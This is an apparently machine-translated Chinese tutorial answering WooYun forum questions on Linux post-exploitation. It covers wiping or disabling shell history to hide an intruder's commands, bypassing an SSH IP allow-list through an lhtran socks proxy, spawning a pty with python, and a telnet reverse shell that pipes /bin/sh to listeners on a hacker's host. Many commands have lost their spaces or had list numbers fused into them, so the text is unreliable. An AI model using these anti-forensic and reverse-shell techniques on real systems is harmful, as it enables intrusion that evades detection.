本攻略的题目收集于乌云专区,每道题其实都有一些不同的解法,而且这套题中很多题目写得不是很清楚,容易引起误解。这道题的解答只是为了入门思路。希望有其他解决方案的同学可以留言一起讨论。1、如何防止登录系统记录历史操作命令?1.修改/etc/profile文件,设置HISTSIZE=1000为0或1#91ri.org注意:HISTSIZE用于设置环境变量中可以保存的历史命令条数。将其设置为0将不会保存它。小编***在wooyun专区看到这个问题,但是专区上的回答都是下面2和3的解决方法。其实最重要的问题应该是修改环境变量。2.或者清除用户的主目录路径,bash_history3。立即清除历史命令history-c4。bash执行的命令并没有立即写入历史文件,而是保存在内部缓冲区中,所以也会等到bash退出的时候再写入。但是,您可以在bash中调用historyw'命令来立即更新历史文件。history-w2,sshrestrictsiplogin,需要ssh登录,怎么处理?如果确认过滤了,并且你有shell,可以先在本机运行lhtran.c做一个socks代理,如果端口被屏蔽过滤后,再使用lhtran连接一个socks代理。这时候你可以试试用这个代理登录他的ssh。运气好的话(机器地址写在allow里),就可以进入系统了。#91ri.org注:wooyun上有人说iptables可以用来转发端口突破。好像只有一个用户shell的话,是无法操作iptables的。可能是小编的知识水平不够高。不知道各位读者有什么想法吗?欢迎留言讨论。这个问题不是很严谨,应该还有其他的方法。3、在无法看到对方是否通过ssh后门登录的情况下,用什么命令可以准确显示?你可以尝试通过linux下的w和who命令查看。w和who命令的用法请参考《Linux中W与Who命令的使用》4。如何获得真正的tty要解决这个问题,首先要知道两个前置知识,tty和console有什么区别:1.console是输出设备,tty是字符设备2.console是虚拟的设备,映射到真实的tty。但是,这个问题的作者似乎不是很了解。小编根据题意给出我个人的理解,大家可以自行参考。方案一:[test@localhost~]$tty/dev/tty2方案二(wooyun@坏虾):python-c'importpty;pty.spawn("/bin/sh")'解法三:[test@localhost~]$who5、如何使用telnet进行反向连接的问题,我们组的同学比较难。网上的资料说这个不能实现,问题感觉不清楚。我们花了2天的时间来解决这个问题。telnet反向连接在实战中的作用:案例一:黑客试图在工业级包检测防火墙或路由器(不代理任何服务的基于路由的防火墙)后面访问UNIX系统的WEB服务器.防火墙对外网只开放80和443。这个web服务器存在phf漏洞(什么是phf漏洞?phf漏洞是什么你自己搞清楚),黑客可以远程在web服务器上执行命令。至此,就可以通过Unix自带的telnet得到一个交互式的shell了。(91ri.org补充:之所以不用NC是因为服务器一般都安装了telnet,限制很少。而且connect是从目标主机发起的,所以可以达到穿透防火墙和内网的功能.)环境假设:targetip:192.168.128.105hackerip:192.168.128.100telnet反向连接命令:target:/usr/bin/telnet192.168.128.10080|/bin/sh|/usr/bin/telnet192.168.128.100hacker:/opt/netcat/bin/nc-l-n-v-p80/opt/netcat/bin/nc-l-n-v-p25命令说明:其实我们是将telnet连接到黑客的80端口NC以上,为了与传统的Unix输入输出机制保持一致,我们通过标准输出,即通过管道,键盘输出到Bourneshell。/bin/sh执行命令的结果再通过管道输出到telnet,返回给黑客的25端口NC。之所以选择80和25是因为大部分防火墙都允许他们对外访问。如果没有防火墙,那么你可以选择任何端口。
